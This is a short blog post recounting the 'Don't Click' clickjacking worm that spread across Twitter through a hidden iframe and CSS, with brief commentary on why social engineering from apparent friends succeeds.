Earlier today, Twitter was hit with a classic social engineering attack. Tweets started showing up everywhere with a simple “Don’t Click” message and a link. Being the curious human beings that we are, we couldn’t resist not clicking the link! Besides – the message was coming from a friend, how could it possibly be something bad?
After clicking the link, through the clever use of a hidden iframe and a bit of CSS (also known as clickjacking), the same message is reposted from your Twitter account. Before long, hundreds and thousands of these “Don’t Click!” messages were all over Twitter.
The simplicity of this attack is actually quite genius. It is almost entirely self-replicating, and for those that saw the message, it was coming from someone who was a “friend”.
This really is social engineering at its best. When you get one of those emails from someone in Nigeria, offering to share their riches with you, if only you’ll send money for the bank fees, most of us know not to trust something like this coming from a complete stranger. But when it’s coming from someone we know, even in the casual sense of “knowing” someone online, we are much more likely to trust the source. We’re just lucky that this attack wasn’t more egregious.
Ironically enough, I didn’t fall prey to this attack, but only because I was stuck in an all-day training class on web security.